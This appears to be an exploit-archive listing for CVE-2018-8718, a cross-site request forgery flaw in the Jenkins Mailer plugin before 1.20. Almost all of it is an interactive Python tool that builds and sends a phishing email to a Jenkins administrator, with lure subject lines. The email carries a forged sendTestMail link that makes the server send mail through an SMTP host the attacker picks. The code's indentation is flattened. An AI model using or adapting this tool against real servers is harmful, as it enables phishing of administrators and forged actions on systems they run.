Jenkins Mailer Cross Site Request Forgery

Jenkins Mailer plugin versions prior to 1.20 suffer from a cross site request forgery vulnerability.


MD5 | 924b7a0ec9e48938b9d8278a33950267

# Exploit Title : Jenkins mailer plugin < 1.20 - Cross-Site Request Forgery
# Date : 2018-06-05
# Exploit Author : Kl3_GMjq6
# Vendor Homepage : https://jenkins.io/
# Software Link : [https://updates.jenkins.io/download/plugins/mailer/1.20/mailer.hpi]
# Version: [Below Version 1.20 (1.1 ~ 1.20) ]
# Ref: https://jenkins.io/security/advisory/2018-03-26/#SECURITY-774
# Tested on : Linux , Windows
# CVE : CVE-2018-8718

import email.message
import smtplib
import getpass

payload_list = ['url','subject','cover_message','sender','reciver','test_email','smtp_server','l_id','l_pw']
table = {}
for i in payload_list :
table.update({i:''})

def send_mail() :
msg = email.message.Message()
msg['Subject'] = table['subject']
msg['From'] = table['sender']
msg['To'] = table['reciver']
msg.add_header('Content-Type','text/html')
msg.set_payload('<a href="'+table['url']+'\
/descriptorByName/hudson.tasks.Mailer/sendTestMail?\
charset=UTF-8&sendTestMailTo='+table['test_email']+'&adminAddress='+table['reciver']+'\
&smtpPort=465&smtpServer='+table['smtp_server']+'&smtpAuthPasswordSecret='+table['l_pw']+'\
&useSMTPAuth=true&useSsl=true&smtpAuthUserName='+table['l_id']+'">\
'+table['cover_message']+'</a>')
s = smtplib.SMTP(table['smtp_server'])
s.starttls()
s.login(table['l_id'],
table['l_pw'])
s.sendmail(msg['From'], [msg['To']], msg.as_string())

def url_set() :
url = str(input("Jenkins Server's URL(ex : http://vuln.jenkins.com) : "))
if len(url) <= 0 :
print (" Can't Be Null!")
url_set()
elif url[0:4] != "http" :
print (" URL must start with 'http://' ")
url_set()
else : table['url'] = url

def subject_set() :
subject = str(input ("SUBJECT [Default : Look! Warning with your Jenkins] : "))
if len(subject) <= 0 :
subject = "Look! Waning with your Jenkins"
table['subject'] = subject

def cover_message() :
cover_message = str(input ("Cover Message [Default : Here is your Vulnable!] : "))
if len(cover_message) <= 0 :
cover_message = "Here is your Vulnable!"
table['cover_message'] = cover_message

def sender() :
sender = str(input ("Attacker E-mail(ex : [email protected]) : "))
if len(sender) <= 0 :
print (" Can't Be Null!")
sender()
else : table['sender'] = sender

def reciver() :
reciver = str(input ("Admin's E-mail(ex : [email protected]) : "))
if len(reciver) <= 0 :
print (" Can't Be Null!")
reciver()
else : table['reciver'] = reciver

def test_email() :
test_email = str(input ("Tester E-mail(ex : [email protected]) : "))
if len(test_email) <= 0 :
print (" Can't Be Null!")
test_email()
table['test_email'] = test_email

def smtp_server() :
smtp_server = str(input ("SMTP_Server [Default : smtp.gmail.com] : "))
if len(smtp_server) <= 0 :
smtp_server = "smtp.gmail.com"
table['smtp_server'] = smtp_server

def l_id() :
l_id = str(input ("Your SMTP_Server ID : "))
if len(l_id) <= 0 :
print (" Can't Be Null!")
l_id()
table['l_id'] = l_id

def l_pw() :
l_pw = str(getpass.getpass("Your SMTP_Server PW : "))
if len(l_pw) <= 0 :
print (" Can't Be Null!")
l_pw()
table['l_pw'] = l_pw

def set_all () :
url_set()
subject_set()
cover_message()
sender()
reciver()
test_email()
smtp_server()
l_id()
l_pw()
print ("Setting Complit! Use 'show' to check options")

set_help = {
'all':"Set all payload",
'help':"Show set commend's help",
'url_set':"Set only 'url_set' payload",
'subject_set':"Set only 'url_set' payload",
'cover_message':"Set only 'cover_message' payload",
'sender':"Set only 'sender' payload",
'reciver':"Set only 'reciver' payload",
'test_email':"Set only 'test_email' payload",
'smtp_server':"Set only 'smtp_server' payload",
'l_id':"Set only 'l_id' payload",
'l_pw':"Set only 'l_pw' payload",
}

def set_select (a) :
if a=="all" : set_all()
elif a=="url_set" : url_set()
elif a=="subject_set" : subject_set()
elif a=="cover_message" : cover_message()
elif a=="sender" : sender()
elif a=="reciver" : reciver()
elif a=="test_email" : test_email()
elif a=="smtp_server" : smtp_server()
elif a=="l_id" : l_id()
elif a=="l_pw" : l_pw()
elif a=="help" :
for i in set_help :
print (" -%-20s %-s" %(i,set_help[i]))
print ('')



while True :
direct = str(input ("CVE-2018-8718 >> ")).lower()

if direct == "help" :
print ("""\
%-10s Show this help menu.
%-10s [-all / -help / -url_set / -subject_set / .... ]
%-10s Set the Payload
%-10s [-all] Show Current Setting.
%-10s Send CSRF use current setting.
""" %("help","set","","show","send"))

elif direct[0:3] == "set" :
if ' -' not in direct :
if direct == "set" :
set_option = ["help"]
else :
print (" Option error \n")
else :
set_option = direct.split(' -')[1:]
okay = 1

if len(set_option) == 1 :
if set_option[0] not in set_help :
print (" Option error \n")
else :
set_select(set_option[0])
elif len(set_option) >= 2 :
for i in set_option :
if i in ['help', 'all'] :
print (" *Option [-help / -all] cannot be use with another options \n")
okay = 0
break
for i in set_option :
if i not in set_help :
print (" Option error \n")
okay = 0
break
if okay == 1 :
for i in set_option :
set_select(i)

elif direct[:4] == "show" :
if " -" not in direct :

if direct == "show" :
for i in table :
if i != "l_pw" :
print (" %-20s %s" %(i,table[i]))
print (" If you want to see l_pw... add [-all] option")
print ("")
else :
print (" Option error \n")
else :
show_option = direct.split(" -")[1:]
if (len(show_option) == 1 and show_option[0] == 'all') :
for i in table :
print (" %-20s %s" %(i,table[i]))
print ()
else :
print (" Option error \n")

elif direct == "send" :
print (" Sending CSRF Mail.....")
try :
send_mail()
print (" Succed!!\n")
except :
print (" Fail....")

elif direct == "exit" :
break

else :
print (" Usage : help\n")



Related Posts